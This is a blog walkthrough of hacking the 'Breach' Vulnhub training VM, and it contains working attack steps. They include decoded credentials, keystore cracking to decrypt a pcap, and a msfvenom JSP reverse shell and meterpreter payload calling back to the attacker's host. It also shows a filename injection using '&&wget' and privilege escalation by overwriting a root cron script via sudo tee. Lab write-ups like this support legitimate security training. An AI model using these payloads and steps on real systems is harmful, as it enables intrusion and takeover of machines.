Breach

First we start with a nmap scan but it took really too long to enumerate it,
So i tried browsing to the ip and found a website there so i started nikto and dirb

Decoding this string in base64 gives us

cGdpYmJvbnM6ZGFtbml0ZmVlbCRnb29kdG9iZWFnYW5nJHRh
pgibbons:damnitfeel$goodtobeagang$ta

#TODO Where is the pcap located on the website

From checking the source code of the web application i found a strange string that looked like base64 and it gave me a user/password to login into the impresscms

when i found the keystore i downloaded a tool to bruteforce the password because i needed the private key to be in a differente, to be able to export it in wireshark to decrypt the pcap

https://github.com/bes/KeystoreBrute

While this worked i tried to be smart about it and did a string on the keyfile wich revealed the word “tomcat” so i tried it as password and it worked!

after finding the password is tomcat

keytool -importkeystore toretype JKS -deststoretype PKCS12 -destkeystore keystore.p12
export the private key from the p12
openssl pkcs12 -in keystore.p12 -nocerts -out privatekey.pem
openssl rsa -in privatekey.pem -out keyout.pem
This decrypt the pcap

Authorization Basic
tomcat:Tt\5D8F(#!*u=G)4m7zB

After searching a LONG time on how to connect to the tomcat service, firefox doesnt work netcat either i found out you can do that with openssl

openssl s_client -connect 192.168.110.140:8443
After debugging the openssl for hours i decided to try with another browser than firefox, i was able to reach the tomcat server with edge!

We can login with the credentials found in the pcap

Because we are admin of the tomcat we can upload a malicious file

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.101.110 LPORT=443 -f war -o /root/Dropbox/Vulnhub/Breach/shell.war
jar -xvf shell.war # to see name of jsp to call

inflated: zhawsspalj.jsp
nc -lvp 443
https://192.168.110.140:8443/shell/zhawsspalj.jsp

sfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.110.110 LPORT=443 -f elf breachmeter.elf

While enumerating the system i found there isnt a root password for mysql, so i dumped all the database, and found the md5 hash for the user milton

submitting this hash to crackstation revealed the password is thelaststraw

checking the logs on this server revealed
Jul 5 06:39:01 Breach CRON[2985]: (root) CMD (/usr/share/cleanup/tidyup.sh)

After trying to inject bash command into the script because i control the destination i found a way to bypass the script so it doesnt delete my file because he doesn’t handle space.
I tried injecting command with a filename like a&&wget 192.168.110.110 so the command that would pass into th shell would be
rm -rf swingline/a&&get 192.168.110.110 wich would execute the command.

I banged my head for about two days trying to exploit via this method
I found something usefull on the internet on how to inject arguments without spaceuo
{ls,-larth}
Even this didn’t work so i did what i had learned best while doing my oscp, Try Harder! (If you are stuck somwhere restart your enumeration from scratch)
While restarting my enumeration i came across a comment in one of the images of the website while running exiftool on it.

It had the comment “cofeestains”
at
From remembering my enumeration i knew there was another user on the system that didn’t seems to interract with it (no trace of him in the logs and nothing in his home directory) his name is blumbergh. I had already tried some basics passwords on the account, but this time i tried with the new information.

su blumbergh // coffeestains

I was in!

Since i though he was the server administrator because he wouldnt need to write anything in his home directory if we can be root.

sudo -l
User blumbergh may run the following commands on Breach:
(root) NOPASSWD: /usr/bin/tee /usr/share/cleanup/tidyup.sh

Okay we dont have all the sudo privilege but we can modify tidyup.sh!

cat /tmp/tidyup.sh | sudo tee /usr/share/cleanup/tidyup.sh
from now we just wait for a connection with our metasploit handler.

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp

we then get a shell as root! Finally 🙂

root@Breach:/root# cat .flag.txt
cat .flag.txt
———————————————————————————–

______ _ __ _____ _____ _ _____ _
| ___ \ | | / | | _ | |_ _| | | ___| | |
| |_/ /_ __ ___ __ _ ___| |__ `| | | |/’ |______| | | |__ ___| |__ _ __ __| |
| ___ \ ‘__/ _ \/ _` |/ __| ‘_ \ | | | /| |______| | | ‘_ \ / _ \ __| ‘_ \ / _` |
| |_/ / | | __/ (_| | (__| | | || |_\ |_/ / | | | | | | __/ |__| | | | (_| |
\____/|_| \___|\__,_|\___|_| |_\___(_)___/ \_/ |_| |_|\___\____/_| |_|\__,_|

———————————————————————————–
Congrats on reaching the end and thanks for trying out my first #vulnhub boot2root!

Shout-out to knightmare, and rastamouse for testing and g0tmi1k for hosting.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s